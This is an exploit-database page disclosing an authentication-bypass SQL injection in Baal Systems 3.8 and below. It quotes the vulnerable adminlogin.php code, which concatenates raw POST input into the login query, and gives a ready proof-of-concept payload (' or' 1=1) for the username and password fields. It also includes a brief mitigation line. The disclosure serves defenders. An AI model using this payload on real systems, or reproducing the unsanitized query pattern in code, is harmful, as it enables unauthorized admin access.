header-logo
Suggest Exploit
vendor:
Baal Systems
by:
cr4wl3r
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Baal Systems
Affected Version From: 3.8
Affected Version To: 3.8
Patch Exists: NO
Related CWE: N/A
CPE: a:baal_systems:baal_systems
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Baal Systems <= 3.8 (Auth Bypass) SQL Injection Vulnerability

Baal Systems version 3.8 and below is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by supplying a crafted username and password to the application, which will bypass the authentication process and allow the attacker to gain access to the application.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

[+] Baal Systems <= 3.8 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>

[+] Vuln Code : 

[adminlogin.php]

<?php
include("common.php");
if (!empty($_POST['password'])) {
	$username = $_POST['username'];
    $password = $_POST['password'];

    $query = "select * from {$tableprefix}tbluser where username='" . $username . "' and password='" . $password . "' and userrole='admin';";
    $result1 = db_query($query);
    $rows = db_num_rows($result1);
    $row = db_fetch_array($result1);
    if ($rows != 0) {
        if (session_is_registered("whossession")) {
            $_SESSION['who'] = "admin";
            $_SESSION['userrole'] = "admin";
            $_SESSION['username'] = $username;
            $_SESSION['usernum'] = $row["userid"];
            header("location:admin.php");
        } else {
            session_register("whossession");
            $_SESSION['who'] = "admin";
            $_SESSION['userrole'] = "admin";
            $_SESSION['username'] = $username;
            $_SESSION['usernum'] = $row["userid"];
            header("location:admin.php");
        } 
    } else {
        header("location:adminlogin.php?error=yes");
    } 
} else {

    ?>

[+] PoC : 

[BaalSystems_path]/adminlogin.php


username: ' or' 1=1
Password: ' or' 1=1

Navigation

Suggest Exploit

Services By CQR